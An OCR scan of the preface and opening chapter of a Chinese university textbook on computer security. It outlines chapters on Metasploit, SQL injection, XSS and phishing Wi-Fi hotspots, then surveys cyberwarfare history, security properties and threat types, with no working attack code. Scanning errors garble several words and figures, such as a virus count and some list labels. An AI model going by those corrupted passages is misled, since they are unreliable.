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随 着 计算 机 及 网 络 技术 应 用 的 不 断 发 展 , 伴 随 而 来 的 计算 机 系统 安全 
问题 越 来 越 引 起 人 们 的 关注 。 计 算 机 系统 一 旦 遭受 破坏 ,将 给 使 用 单位 造 
成 重大 经 济 损失 ,并 严重 影响 正常 工作 的 顺利 开展 。 因 此 , 越 来 越 多 的 企业 
或 个 人 逐步 意识 到 计算 机 安全 防护 的 重要 性 。 计 算 机 网 络 、 数 据 通信 、 电 子 
商务 .办 公 自 动 化 等 领域 都 需要 解决 计算 机 安全 问题 。 如 何 保护 企业 或 个 
人 的 信息 系统 免 遭 非法 入 侵 , 如 何 防止 计算 机 病毒 .木马 等 对 内 部 网 络 的 侵 
害 , 这 些 都 是 信息 时 代 企 业 或 个 人 面临 的 实际 问题 。 因 此 ,社会 对 计算 机 安 
全 技术 的 需求 也 越 来 越 迫 切 ,为 了 满足 社会 的 需要 ,各 高 等 院 校 计算 机 相关 
专业 相继 开设 了 计算 机 安全 方面 的 课程 。 但 是 ,目前 多 数 计算 机 安全 技术 
方面 的 教材 偏重 于 理论 ,不 能 很 好 地 激发 学 生 学 习 这 门 课 的 兴趣 ,所 以 ,为 
了 满足 计算 机 安全 技术 教学 方面 的 需求 ,笔者 编写 了 《计算 机 安全 技术 )( 第 
2 版) 这 本 书 。 本 书 在 第 1 版 (2010 年 出 版 ) 的 基础 上 .删除 元 余 陈 旧 的 知识 
和 技能 ,补充 了 在 实际 项 目 中 常用 的 知识 点 和 操作 技巧 。 

本 书 以 解决 具体 计算 机 安全 问题 为 目的 ,全 面 介绍 了 计算 机 安全 领域 
的 实用 技术 ,帮助 读者 了 解 计算 机 安全 技术 体系 ,掌握 维护 信息 系统 安全 的 
常用 技术 和 手段 ,解决 实际 信息 系统 的 安全 问题 ,使 读者 从 全 方位 建立 起 对 
计算 机 安全 保障 体系 的 认识 。 

本 书 共 8 章 。 第 1 章 介绍 计算 机 安全 的 基本 概念 .计算 机 安全 面临 的 
威胁 以 及 计算 机 安全 技术 体系 结构 。 通 过 本 章 的 学 习 , 使 读者 对 计算 机 安 
全 有 一 个 整体 的 认识 。 第 2 章 通 过 对 环境 安全 设备 安全 ,电源 系 统 安全 以 
及 通信 线路 安全 的 详细 介绍 ,帮助 读者 了 解 物 理 安全 的 相关 知识 ,并 且 能 够 
运用 本 章 介绍 的 知识 和 技术 来 保障 信息 系统 的 物理 安全 。 第 3 章 介绍 常用 
加 密 方法 、 密 码 学 的 基本 概念 、 破 解 用 户 密码 的 方法 .文件 加 密 的 方法 ,理解 
数字 签名 技术 以 及 PKI, 并 且 通 过 对 一 系列 实例 的 介绍 ,加 深 读 者 对 基础 安 
全 方面 的 基础 知识 和 技术 的 理解 ,使 读者 能 够 运用 一 些 工 具 软 件 来 保护 自 
己 在 工作 或 生活 中 的 机 密 或 隐私 数据 。 第 4 章 主要 介绍 操作 系统 安全 基 
fill Kali Linux, Linux 系统 安全 配置 ,然后 简单 介绍 了 Linux 自主 访问 控制 
与 强制 访问 控制 的 概念 以 及 计算 机 系统 安全 等 级 标准 。 通 过 入 侵 Windows 
XP 这 个 例子 ,重点 介绍 了 Metasploit 的 使 用 方法 。 第 5 章 介绍 了 端口 与 漏 
洞 扫描 以 及 网 络 监 听 技术 、 缓 冲 区 溢出 攻击 及 其 防范 `DoS 与 DDoS 攻击 检 
测 与 防御 arp 欺骗 、 防 火 墙 技术 .入 侵 检测 与 人 侵 防 御 技术 .计算 机 病毒 、 
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VPN 技术 、httptunnel 技术 、 蜜 钠 技术 以 及 无 线 网 络 安全 等 内 容 。 并 且 通 过 对 一 系列 实例 
的 介绍 ,加 深 读 者 对 网 络 安 全 和 攻防 方面 的 基础 知识 和 技术 的 理解 ,帮助 读者 提高 解决 实际 
网 络 安全 问题 的 能 力 。 第 6 章 介 绍 了 SQL 注入 式 攻击 的 原理 ,对 SQL 注入 式 攻击 的 防范 、 
常见 的 数据 库 安全 问题 及 安全 威胁 、 数 据 库 安全 管理 原则 等 内 容 。 同 时 通过 对 一 系列 实例 
的 介绍 ,加 深 读 者 对 数据 库 安全 管理 方面 的 基础 知识 和 技术 的 理解 ,帮助 读者 提高 维护 数据 
库 安 全 的 能 力 , 并 且 在 进行 Web 开发 时 要 注意 防范 SQL 注入 式 攻击 。 第 7 章 介绍 了 Web 
应 用 安全 、XSS 跨 站 攻击 技术 .电子 邮件 加 密 技术 、 防 垃圾 邮件 技术 .网 上 银行 账户 安全 党 
iR Kali Linux 中 创建 钓鱼 Wi-Fi 热点 以 及 WinHex 的 一 般 使 用 方法 。 通 过 本 章 的 学 习 , 读 
者 对 网 络 应 用 中 存在 的 一 些 威胁 有 一 个 清楚 的 认识 ,进而 提高 读者 安全 使 用 网 络 的 水 平和 
技能 。 第 8 章 介 绍 了 容 灾 技术 的 基本 概念 .RAID 级 别 及 其 特点 、 数 据 备 份 技术 的 基本 概念 
以 及 Ghost 的 使 用 方法 。 通 过 本 章 的 学 习 , 使 读者 理解 容 灾 与 数据 备份 技术 在 信息 安全 领 
域 所 具有 的 举足轻重 的 地 位 ,在 以 后 的 生活 或 工作 中 ,要 强化 安全 意识 ,采取 有 效 的 容 灾 与 
数据 备份 技术 , 尽 可 能 地 保障 系统 和 数据 的 安全 。 

本 书 涉及 的 操作 系统 较 多 ,因此 给 出 如 下 建议 。 

(1) 物理 机 (笔记 本 或 带 有 无 线 网 卡 的 台式 机 ) 上 需 安 装 双 系 统 : Windows 7, Kali 
Linux 2.0。 

(2) Windows 7 上 安装 VMware, 在 VMware 中 创建 5 个 虚拟 机 ,然后 在 虚拟 机 中 分 别 
安装 CentOS 5. 0(32bit)、Kali Linux 2. 0, Windows XP SP1, Windows Server 2003 EE 
SP1, Windows Server 2003 EE SP2。 请 读者 根据 不 同 的 实验 ,选用 对 应 的 操作 系统 。 

另外 ,由 于 有 些 实验 用 到 木马 或 病毒 程序 ,所 以 请 读者 在 虚拟 机 中 做 相关 实验 。 

本 书 由 北京 邮电 大 学 博士 张 同 光 任 主编 . 陈 明 、 宋 丽 丽 、 吴 炬 华 、 张 红 霞 、 张 家 平 任 副 主 
编 。 其 中 张 同 光 编写 第 3 章 、 第 4 章 . 第 7 章 、 第 8 章 , 郑 州 轻工业 学 院 陈 明 、 新 乡 学 院 吴 炬 
华 ,河南 农业 职业 学 院 张 红 霞 和 新 乡 学 院 张 家 平 共同 编写 第 1 章 、 第 5 章 和 第 6 章 ,新 乡 学 
院 宋 丽 丽 编写 第 2 章 。 其 他 编写 者 还 有 纪 伟 雪 、 王 根 运 、 赵 佩 章 、 田 考 饮 、 楚 莉莉 、 王 建 超 、 
朱 莹 、 王 晓 兵 、 沈 林 等 。 全 书 最 后 由 张 同 光 (http://ztguang. blog. chinaunix. net,jsjoscpu@ 
163. com) 统 稿 和 定稿 。 
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第 1 章 计算 机 安全 概述 


本 章 学 习 目标 

。 认识 到 计算 机 安全 的 重要 性 。 

。 了 解 计 算 机 系统 面临 的 威胁 。 

t 了 解 计 算 机 安全 的 基本 概念 。 

t 了 解 计 算 机 安全 技术 体系 结构 。 

。 了 解 安 全 系统 设计 原则 以 及 人 、 制 度 和 技术 之 间 的 关系 。 


2015 年 3 月 5 日 上 午 十 二 届 全 国人 大 三 次 会 议 上 ,李克强 总 理 在 政府 工作 报告 中 首次 
提出 “互联 网 十 ”行动 计划 ,推动 移动 互联 网 、 云 计算 、 大 数据 、 物 联网 等 与 现代 制造 业 结合 ， 
促进 电子 商务 .工业 互联 网 和 互联 网 金融 健康 发 展 ,引导 互联 网 企业 拓展 国际 市 场 。 

随 着 “互联 网 十 ”战略 的 落地 和 提速 ,各 行 各 业 与 互联 网 的 融合 日 益 加 深 , 计 算 机 安全 成 
为 互联 网 行业 中 的 基本 要 求 。 因 此 ,计算 机 安全 是 保障 互联 网 十 ”战略 实施 的 重要 环节 。 

2011 Æ 5 H 25 日 ,中 国 国防 部 新 闻 发 言 人 耿 雁 生 大 校 首次 确认 ,解放 军 已 经 建立 了 网 
络 蓝 军 。 网 络 战 已 经 开启 ,网络 战 将 长 期 持续 。 下 面 介绍 一 下 网 络 战 的 大 致 由 来 。 

美国 总 统 奥巴马 于 2009 年 5 月 29 日 公布 网 络 安 全 评估 报告 时 指出 ,来 自 网 络 空 间 的 
威胁 已 经 成 为 美国 面临 的 最 严重 的 经 济 和 军事 威胁 之 一 。 为 应 对 来 自 网 络 空间 的 威胁 ,为 
了 打击 黑客 和 敌对 国家 的 网 络 攻击 ,酝酿 筹备 近 一 年 的 美军 “网 络 司令 部 ”于 2010 年 5 月 
21 日 正式 启动 ,于 2010 4E 10 月 全 面 运作 。 网 络 司令 部 隶属 美国 战略 司令 部 ,位 于 马里 兰 
州 的 米 德 保 军事 基地 ,编制 近 千 人 ,主要 职责 是 进行 网 络 防御 和 网 络 渗透 作战 。 一 直 以 来 美 
军 各 部 门 都 在 网 络 领域 孤军 作战 ,网 络 司令 部 将 统一 管理 .强化 对 策 , 并 将 积极 寻求 国际 合 
作 。 美 国 国防 部 长 盖 茨 称 :“ 网 络 司令 部 的 成 立 旨 在 改变 网 络 的 脆弱 性 ,更 好 地 应 对 越 来 越 
多 的 网 络 威胁 。” 

网 络 攻击 有 可 能 使 现代 社会 的 机 能 陷入 瘫痪 ,在 现代 战争 中 信息 技术 已 变 得 不 可 或 缺 。 
因此 ,美国 把 网 络 防御 定位 为 国家 安全 保障 上 的 重大 课题 。 

美国 是 世界 上 第 一 个 提出 网 络 战 概念 的 国家 ,也 是 第 一 个 将 其 应 用 于 实战 ,但 美军 尚未 
形成 统一 的 网 络 战 指 挥 体系 。 与 论 认为 ,组 建 网 络 司令 部 ,意味 着 美国 准备 加 强 争夺 网 络 空 
间 霸 权 的 行动 。 网 络 战 作为 一 种 全 新 的 战争 样式 正在 走 上 战争 舞台 。 

组 建 网 络 司令 部 表明 ,美军 研制 多 年 的 网 络 战 手段 已 基本 成 熟 ,并 做 好 了 打 网 络 战 的 准 
备 。 目 前 美军 已 经 拥有 大 批 网 络 战 武 器 ,在 软件 方面 ,已 研制 出 2000 4 (E38 SE SR "Aj 
算 机 病毒 ; 在 硬件 方面 , 则 研发 了 电磁 脉冲 弹 、 次 声波 武器 、 高 功率 微波 武器 ,可 对 敌 方 网 络 
进行 物理 攻击 。 尤 其 值得 注意 的 是 .美国 利用 其 握 有 核心 信息 技术 的 优势 ,在 芯片 .操作 系 
统 等 硬 软件 上 预 留 “ 后 门 ”, 植 人 木马 病毒 .一旦 需要 . 即 可 进入 对 方 网 络 系统 或 激活 “沉睡 ” 
的 病毒 。 


除 美国 外 ,世界 上 许多 国家 也 纷纷 组 建 网 络 战 部 队 , 英 国 、 日 本 、 俄 罗斯 法 国 \ 德 国 、 印 
度 、 朝 鲜 等 国家 都 已 建立 起 成 编制 的 网 络 战 部 队 。 

近年 来 ,各 种 网 络 战 手段 已 经 在 局 部 战争 中 得 到 多 次 运用 。 

早 在 1991 年 海湾 战争 中 ,美军 就 对 伊拉克 使 用 了 一 些 网 络 战 手段 。 开 战 前 ,美国 中 央 
情报 局 派 特 工 秘密 打 入 伊拉克 内 部 ,将 伊 军 购买 自 法 国 的 防空 系统 使 用 的 打印 机 芯片 , 换 上 
了 感 当 有 病毒 的 芯片 ,在 空袭 前 用 遥控 手段 激活 病毒 ,致使 伊 军 防空 指挥 中 心 主 计算 机 系统 
程序 错乱 ,防空 计算 机 控制 系统 失灵 。 

在 1999 年 科索沃 战争 中 ,“ 南 联盟 ”组 织 黑 客 , 使 用 多 种 计算 机 病毒 ,使 “北约 ”的 一 些 计 
算 机 网 络 一 度 瘫痪 。“ 北 约 "方面 也 不 甘 示弱 进行 网 络 反 击 ,在 “ 南 联盟 "军用 计算 机 网 络 系 
统 中 植 人 大 量 病毒 和 欺骗 性 信息 ,导致 * 南 联盟 ?防空 体系 失效 失 能 。 

2003 年 伊拉克 战争 中 ,美军 网 络 战 手 段 升 级 ,在 战 前 就 往 数 千 名 伊拉克 军政 要 员 的 邮 
箱 中 发 送 “ 劝 降 信 ”, 开 战 后 4 小 时 不 到 就 封杀 了 持 中 立 立 场 的 半岛 电视 台 , 对 伊 军心 士气 造 
成 极 大 打击 。 

2003 年 夏天 ,冲击 波 蠕虫 病毒 在 全 世界 范围 内 传播 ,对 于 运行 着 Microsoft Windows 
的 不 计 其 数 主机 来 说 简直 就 是 一 场 亚 梦 , 同 时 给 广大 网 民 留 下 了 悲伤 的 回忆 。 

从 2008 年 年 底 开始 ,Conficker 蠕虫 病毒 开始 利用 Windows 操作 系统 的 漏洞 感染 计算 
机 系统 ,并 开始 广泛 传播 。 截 至 2009 年 6 月 ,已 有 数 百 万 台 计 算 机 系统 受到 Conficker 蠕虫 
病毒 的 控制 。 

2011 年 个 人 的 网 络 游击 战 也 频繁 打响 。 从 中 东 ,北非 的 动荡 到 伦敦 骚乱 .占领 华尔街 ， 
这 些 活动 不 分 东西 方 . 不 分 阵营 ,对 主权 国家 的 有 序 统治 形成 威胁 。 互 联网 在 其 中 扮演 了 非 
常 重要 的 角色 。 与 以 往 战争 不 同 的 是 ,2011 年 遍及 多 国 的 草根 网 络 行动 组 织 能 力 低 、 目 的 
性 弱 , 但 破坏 力 惊人 。 

2011 年 12 H 16 HAMLA - 曼 宁 案 在 米 德 堡 军 事 法 庭 接受 听证 。 曼 宁 当 时 24 V. 
曾 为 美国 陆军 一 等 兵 , 情 报 分 析 员 ,他 把 大 量 美国 军事 和 外 交 机 密 刻 在 光盘 里 转交 给 维基 解 
密 网 站 ,给 美国 带 来 了 负面 的 影响 。 

现在 全 球 至 少 有 25 个 国家 有 “网 军力 量 。 在 国家 间 把 网 络 对 抗 当成 军事 手段 的 同时 ， 
个 人 通过 网 络 反 政 府 ` 反 社会 的 行为 也 在 增多 。 互 联网 治理 .社会 管理 .应 对 跨国 犯罪 等 方 
面 正 日 益 需 要 各 个 国家 加 强 合作 。 

现在 ,国家 间 的 网 络 战 在 向 纵深 发 展 ,个 人 的 网 络 行为 也 更 加 活跃 。 因 此 , 随 着 计算 机 
及 网 络 技术 应 用 的 不 断 发 展 ,伴随 而 来 的 信息 系统 安全 问题 更 加 引起 人 们 的 关注 。 计 算 机 
系统 一 旦 遭受 破坏 ,将 给 使 用 单位 造成 重大 经 济 损失 ,并 严重 影响 正常 工作 的 顺利 开展 。 

2013 年 6 月 ,前 中 情 局 (CIA) 职 员 爱 德 华 . 斯 诺 登 将 两 份 绝密 资料 交 给 英国 4 卫 报 》 和 
美国 (华盛顿 邮 报 》, 并 告 之 媒体 何 时 发 表 。 按 照 设 定 的 计划 ,2013 年 6 月 5 日 ,英国 ( 卫 报 》 
先 扔 出 了 第 一 颗 与 论 炸 弹 : 美国 国家 安全 局 有 一 项 代号 为 “棱镜 ”的 秘密 项 目 , 要 求 电信 巨 
头 威 瑞 森 公司 必须 每 天 上 交 数 百 万 用 户 的 通话 记录 。2013 年 6 月 6 日 ,美国 (华盛顿 邮 报 》 
披露 称 , 过 去 6 年间. 美国 国家 安全 局 和 联邦 调查 局 通过 进入 微软 谷歌. 人 苹果、 雅虎 等 九 大 
网 络 巨 头 的 服务 器 ,监控 美国 公民 的 电子 邮件 、 聊 天 记录 、 视 频 及 照片 等 秘密 资料 。 美 国 熏 
论 随 之 哗然 。 这 就 是 美国 “棱镜 门 ” 事 件 。 

计算 机 安全 是 一 个 涉及 多 知识 领域 的 综合 学 科 , 只 有 全 面 和 掌握 相关 的 基础 理论 和 技术 


原理 ,才能 准确 把 握 和 应 用 各 种 安全 技术 和 产品 。 


11 计算 机 安全 的 基本 概念 


在 计算 机 系统 中 ,所 有 的 文件 ,包括 各 类 程序 文件 .数据 文件 .资料 文件 数据库 文件 ,其 
至 硬件 系统 的 品牌 结构、 指令 系统 等 都 属于 信息 。 

信息 已 渗透 到 社会 的 方方面面 ,信息 的 特殊 性 在 于 无 限 的 可 重复 性 和 易 修改 性 。 

信息 安全 是 指 秘密 信息 在 产生 、 传 输 、 使 用 和 存储 过 程 中 不 被 泄露 或 破坏 。 信 息 安 全 涉 
及 信息 的 保密 性 ,完整 性 、 可 用 性 和 不 可 否认 性 。 综 合 来 说 ,就 是 要 保障 信息 的 有 效 性 ,使 信 
息 避 免 遭 受 一 系列 威胁 ,保证 业务 的 持续 性 ,最 大 限度 地 减少 损失 。 

1. 计算 机 安全 的 4 个 方面 

(1) 保密 性 。 保 密 性 是 指 对 抗 对 手 的 被 动 攻 击 , 确 保 信息 不 泄露 给 未 经 授权 的 个 人 和 
实体 。 采 取 的 措施 包括 : 信息 的 加 密 解密 ; 划分 信息 的 密级 ,为 用 户 分 配 不 同 权限 ,对 不 同 
权限 用 户 访问 的 对 象 进行 访问 控制 ; 防止 硬件 辐射 泄露 .网络 截获 和 窃听 等 。 

(2) 完整 性 。 完 整 性 是 指 对 抗 对手 的 主动 攻击 ,防止 信息 被 未 经 授权 的 人 自 改 , 即 保证 
信息 在 存储 或 传输 的 过 程 中 不 被 修改 ,破坏 及 丢失 。 完 整 性 可 通过 对 信息 完整 性 进行 检验 、 
对 信息 交换 真实 性 和 有 效 性 进行 鉴别 以 及 对 系统 功能 正确 性 进行 确认 来 实现 。 该 过 程 可 通 
过 密码 技术 来 完成 。 

(3) 可 用 性 。 可 用 性 是 指 保证 信息 及 信息 系统 确 为 授权 者 所 使 用 ,确保 合法 用 户 可 访 
问 并 按 要 求 的 特性 使 用 信息 及 信息 系统 , 即 当 需要 时 能 存 取 所 需 信息 ,防止 由 于 计算 机 病毒 
或 其 他 人 为 因素 而 造成 系统 拒绝 服务 。 维 护 或 恢复 信息 可 用 性 的 方法 有 很 多 ,如 对 计算 机 
和 指定 数据 文件 的 存 取 进 行 严格 控制 ,进行 系统 备份 和 可 信和 恢复 ,探测 攻击 及 应 急 处 理 等 。 

(4) 不 可 否认 性 。 不 可 否认 性 是 指 保证 信息 的 发 送 者 无 法 否认 已 发 出 的 信息 ,信息 的 
接收 者 无 法 否认 已 经 接收 的 信息 。 例 如 ,保证 曾经 发 出 过 数据 或 信号 的 发 送 方 事后 不 能 否 
认 。 可 通过 数字 签名 技术 来 确保 信息 提供 者 无 法 否认 自己 的 行为 。 

2. 计算 机 安全 的 组 成 

一 般 来 说 ,计算 机 安全 主要 包括 系统 安全 和 数据 安全 两 个 方面 。 

CD 系统 安全 。 一 般 采用 防火 墙 、 防 病毒 及 其 他 安全 防范 技术 等 措施 ,是 属于 被 动 型 的 
安全 措施 。 

(2) 数据 安全 。 主 要 采用 现代 密码 技术 对 数据 进行 主动 的 安全 保护 ,如 数据 保密 、 数 据 
完整 性 、 数 据 不 可 否认 与 抵赖 、 双 向 身份 认证 等 技术 。 

3. 计算 机 系统 的 可 用 性 

可 用 性 (Availability) 是 指 系统 在 规定 条 件 下 ,完成 规定 功能 的 能 力 。 可 用 性 表现 为 三 
个 方面 。 

CD 可 靠 性 。 如 果 系 统 从 来 没有 出 现 故 障 ,那么 可 用 性 就 是 100% ,但 这 是 不 可 能 的 ,所 
以 引进 一 个 辅助 参数 一 一 可 靠 性 (Reliability) , 即 在 一 定 的 条 件 下 ,在 指定 的 时 期 内 系统 无 
故障 地 执行 指令 任务 的 可 能 性 。 系 统 可 靠 性 在 数值 的 度量 中 采取 可 靠 度 衡量 。 

可 靠 度 的 定义 是 : 在 1 时刻 系 统 正常 的 条 件 下 ,在 给 定 的 时 间 间 隔 内 .系统 仍然 能 正确 
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执行 其 功能 的 概率 。 可 靠 度 有 三 种 : 抗 毁 性 .生存 性 和 有 效 性 。 可 靠 度 主 要 表现 在 硬件 可 
靠 性 、 软 件 可 靠 性 、 人 员 可 靠 性 、 环 境 可 靠 性 等 方面 。 

(2) 可 维修 性 。 指 系统 发 生 故 障 时 容易 进行 修复 ,以 及 平时 易于 维护 的 程度 。 

(3) 维修 保障 。 即 后 勤 支援 能 力 。 

提高 计算 机 的 可 用 性 一 般 采 取 两 项 措施 : 避 错 、 容 错 。 

Q_ 避 错 。 提 高 软 硬 件 的 质量 ,抵御 故障 的 发 生 。 要 求 组 成 系统 的 各 个 部 件 、 器 件 、 软 件 
具有 高 可 靠 性 ,不 允许 出 错 ,或 者 出 错 率 降 至 最 低 。 通 过 元 器 件 的 精 选 、 严 格 的 工艺 、 精 心 的 
设计 来 提高 可 靠 性 。 在 现 有 条 件 下 避 错 设计 是 提高 系统 可 靠 性 的 有 效 办 法 。 

© 容错 。 一 个 系统 ,无 论 采 用 多 少 避 错 设计 方法 , 避 错 对 于 可 靠 性 的 提高 是 有 限 的 ,总 
不 能 保证 永远 不 出 错 。 所 以 应 发 展 容错 技术 ,使 得 在 故障 发 生 时 系统 仍 能 继续 运行 。 容 错 
设计 是 在 承认 故障 存在 的 情况 下 进行 的 ,是 指 在 计算 机 内 部 出 现 故障 的 情况 下 ,计算 机 仍 能 
正确 地 运行 程序 并 给 出 正确 结果 的 设计 。 
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计算 机 资源 易 受 到 自然 和 人 为 因素 不 利 影响 的 原因 有 : 计算 机 是 电子 技术 产品 ,其 
所 处 理 的 信息 也 是 各 种 电子 信号 ; 四 系统 运行 是 靠 程序 控制 的 ,一 个 大 型 计算 机 信息 系统 
具有 数 百 万 个 受 各 种 程序 控制 的 逻辑 单元 ; 加 计算 机 资源 自身 抗 外 界 影响 的 能 力 还 比较 
弱 , 安 全 存 取 控 制 功能 还 不 够 完善 ; @ 其 对 运行 环境 的 要 求 比较 高 ; 加 现代 化 管理 不 够 
AUT o 

1. 计算 机 系统 的 脆弱 性 

计算 机 系统 的 脆弱 因素 包括 以 下 方面 。 

(1) 数据 输入 部 分 : 数据 通过 输入 设备 ,输入 系统 进行 处 理 , 数 据 易 被 臭 改 或 输入 假 
数据 。 

(2) 数据 输出 部 分 : 经 处 理 后 的 数据 要 在 这 里 译 成 人 们 能 阅读 的 文件 ,并 通过 各 种 输 
出 设备 输出 ,信息 有 可 能 被 泄露 或 被 截取 。 

(3) 数据 库 部 分 : 数据 库存 有 大 量 的 各 种 数据 ,有 的 数据 资料 价值 连城 ,如 果 遭 到 破 
坏 ,损失 是 难以 估价 的 。 

(4) 程序 部 分 : 用 语言 写成 机 器 能 处 理 的 程序 ,这 种 程序 可 能 会 被 算 改 或 盗 穷 。 

CO 操作 系统 : 操作 系统 是 操纵 系统 运行 、 保 证 数据 安全 、 协 调处 理 业务 和 联机 运行 的 
关键 部 分 ,如 被 破坏 就 等 于 破坏 了 系统 功能 。 

(6) 硬件 部 分 : 除 软 件 以 外 的 所 有 硬 设备 ,这 些 电子 设备 最 容易 被 破坏 或 盗 穷 。 

(7) 通信 部 分 : 信息 或 数据 要 通过 它 在 计算 机 之 间或 主机 与 终端 及 网 络 之 间 传 送 , 通 
信 线 路 一 般 是 电话 线 、 专 线 、 微 波 、 光 缆 , 前 三 种 线路 上 的 信息 易 被 截取 。 

CD 电磁 波 辐射 : 计算 机 设备 本 身 就 有 电磁 辐射 问题 :也 怕 外 界 电磁 波 的 辐射 和 干扰 ， 
特别 是 自身 辐射 带 有 信息 容易 被 别人 接收 ,造成 信息 泄露 。 

(9) 辅助 保障 系统 : 水 、 电 、 空 调 中 断 或 不 正常 ,会 影响 系统 运行 。 

(10) 存 取 控制 部 分 : 安全 存 取 控制 功能 还 比较 弱 。 


(11) 自然 因素 : 水 `. 电 \ 火 静电、 灰尘 有 害 气 体 、. 地 震 、 雷 电 、 强 磁场 和 电磁 脉冲 等 危 
害 。 这 些 危害 有 的 会 损害 系统 设备 ,有 的 则 会 破坏 数据 ,甚至 毁 掉 整 个 系统 和 数据 。 

(020 人 为 因素 : 安全 管理 水 平 低 .人 员 技 术 素 质 差 .操作 失误 或 错误 .违法 犯罪 行 
为 等 。 

以 上 计算 机 的 不 安全 因素 说 明 ,计算 机 自身 的 脆弱 性 十 分 严重 。 现 在 计算 机 已 经 应 用 
到 民航 、 铁 路 .电力 .银行 和 其 他 经 济 管理 ,政府 办 公 、 军 事 指挥 控制 等 国家 重大 要 害 部 门 或 
涉及 全 国 性 的 大 型 信息 系统 之 中 ,如 果 某 个 关键 部 分 出 了 问题 ,不 但 系统 内 可 能 产生 灾难 性 
的 多 米 诺 反 应 ,而 且 会 造成 严重 的 政治 、 经 济 损失 ,甚至 危及 人 民生 命 财产 的 安全 。 如 果 系 
统 中 的 重要 数据 遭 破 坏 或 某 些 敏感 信息 被 泄露 ,其 后 果 也 是 不 堪 设 想 的 。 

2. 计算 机 系统 面临 的 威胁 

由 于 计算 机 系统 的 复杂 性 .开放 人 性 以 及 系统 软 硬 件 和 网 络 协议 的 缺陷 ,导致 了 计算 机 系 
统 的 安全 威胁 是 多 方面 的 ,具体 如 下 : 网 络 协议 的 弱点 、 网 络 操作 系统 的 漏洞 .应 用 系统 设 
计 的 漏洞 、 网 络 系统 设计 的 缺陷 、 恶 意 攻击 、 病 毒 . 黑 客 的 攻击 、 合 法 用 户 的 攻击 、 物 理 安全 、 
管理 安全 等 。 

另外 , 非 技术 的 社会 工程 攻击 也 是 计算 机 安全 面临 的 威胁 ,通常 把 基于 非 计 算 机 的 欺骗 
技术 称 为 社会 工程 。 社 会 工程 中 ,攻击 者 设法 伪装 自己 的 身份 让 人 相信 他 就 是 某 个 人 ,从 而 
去 获得 密码 和 其 他 敏感 的 信息 。 目 前 社会 工程 攻击 主要 包括 两 种 方式 : 打 电 话 请 求 密码 和 
伪造 E-mail, 

计算 机 安全 的 实质 是 计算 机 资源 存在 着 的 各 种 各 样 的 威胁 。 按 照 造 成 这 些 威胁 的 人 员 
对 计算 机 的 接近 程度 的 不 同 ,可 以 分 为 以 下 四 类 。 

OD. 外 部 人 员 : 不 能 进入 计算 机 中 心 或 机 房 的 人 员 。 

由 于 外 部 人 员 不 能 进入 计算 机 中 心 , 因 此 他 们 只 能 在 外 面 进行 攻击 ,主要 攻击 目标 是 网 
络 中 的 通信 线路 等 外 部 设施 ,可 能 产生 的 威胁 有 以 下 方面 。 

D 搭 线 窃听 .: 在 计算 机 的 通信 线路 上 ,. 搭 上 一 个 侦 听 设备 ,从 而 获得 线路 上 传输 的 机 
密 信息 。 

@ 电磁 辐射 : 通过 接受 计算 机 系统 辐射 出 的 信号 而 获得 机 密 信息 。 

© 口令 猜测 : 通过 猜测 口令 而 进入 网 络 系统 中 。 

CD 密 文 分 析 : 通过 分 析 线 路 上 传输 的 加 密 信息 而 得 到 明文 。 

© 流量 分 析 : 通过 观察 通信 线路 上 的 信息 流量 ,得 到 信息 的 源 点 和 终点 ,发 送 频 率 、 报 
文 长 度 等 ,从 而 推断 出 信息 的 某 些 重要 特性 。 

© RF: 轧 弄 或 欺骗 计算 机 中 心 的 人 员 ,从 而 达到 自己 的 非法 目的 。 

防止 这 些 攻击 的 唯一 有 效 办 法 是 : 将 通信 线路 上 的 信息 加 密 ,. 并 且 在 网 络 中 实行 可 靠 
的 协议 ,防止 信息 在 加 密 之 前 从 机 房 中 泄露 出 去 。 

(2) 物理 存 取 人 员 : 这 类 人 员 能 进入 计算 机 中 心 但 没有 多 少 上 机 的 权利 。 

他 们 的 主要 攻击 目标 是 计算 机 中 心 内 部 ,可 以 产生 如 下 一 些 威胁 。 

CD 窃听 : 将 窃听 器 安装 在 中 心里 , 录 下 中 心 人 员 之 间 的 谈话 。 

© UL. 站 在 终端 用 户 的 身后 ,观察 其 操作 过 程 。 

C) 插入 : 当 用 户 离开 终端 后 ,攻击 者 利用 仍 开 着 的 终端 做 自己 的 事情 。 

© 蒙 面 : 在 计算 机 中 心 的 某 些 地 方 ,得 到 粗心 大 意 的 人 写 下 的 口令 ,从 而 冒 称 该 人 ,使 
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用 机 器 。 

C 推导 : 从 统计 数据 库 中 获得 的 统计 信息 出 发 ,推导 出 某 些 不 应 该 知道 的 信息 。 

浏览 : 通过 观察 中 心 内 部 的 情况 或 机 器 中 的 某 些 公用 文件 而 获得 有 用 的 信息 。 

© 废物 : 从 当 作废 物 的 打印 纸 中 寻找 有 用 的 信息 。 

设备 安装 : 攻击 者 将 EPROM 或 类 似 的 电路 芯片 蔡 换 并 重新 插入 机 器 中 ,使 机 器 按 
照 攻 击 者 的 目的 运行 。 

对 于 这 些 攻击 ,有 效 的 防范 办 法 是 : 加 强 机 房 的 出 入 管理 ,包括 人 员 的 进出 管理 .记录 
机 密 信息 的 媒介 出 入 机 房 的 管理 。 

(3) 系统 存 取 人 员 : 这 类 人 员 通 常 是 计算 机 中 心 的 普通 用 户 , 他 们 在 系统 里 拥有 的 权 
利 不 是 太 多 。 

他 们 能 够 实际 操作 机 器 ,具有 较 大 的 危险 性 ,构成 的 威胁 有 以 下 方面 。 

CD SRBE: 在 程序 中 制造 某 些 故意 的 错误 ,强制 使 机 器 停止 运转 。 

@ RA: 有 些 操作 系统 为 了 日 后 的 维护 而 留 下 了 入 口 ,攻击 者 可 利用 这 些 和 人 口 作 为 进 
入 操作 系统 的 天 窗 。 

C) 聚合 : 将 能 合法 得 到 的 几 项 信息 综合 起 来 ,从 而 知道 一 些 不 应 该 知道 的 保密 信息 。 

CD 拷贝 : 将 有 关 程 序 和 数据 复制 下 来 带 回 家 去 。 

© 骚扰 : 攻击 者 在 终端 上 做 出 某 些 令 操 作 员 生 气 的 事情 ,使 其 容易 发 生 错误 ,从 而 达 
到 自己 的 目的 。 

系统 存 取 人 员 具 有 的 特权 比较 少 ,很 想 扩 大 自己 的 特权 ,系统 管理 员 要 严密 监视 他 们 的 
工作 ,特别 注意 一 些 奇异 现象 的 发 生 ,如 机 器 发 生 骨 溃 等 ,要 立即 采取 有 效 措施 。 

(4) 编程 特权 人 员 : 这 类 人 员 能 在 计算 机 上 编制 自己 的 程序 ,通常 是 指 那些 系统 编程 
人 员 和 系统 维护 人 员 。 

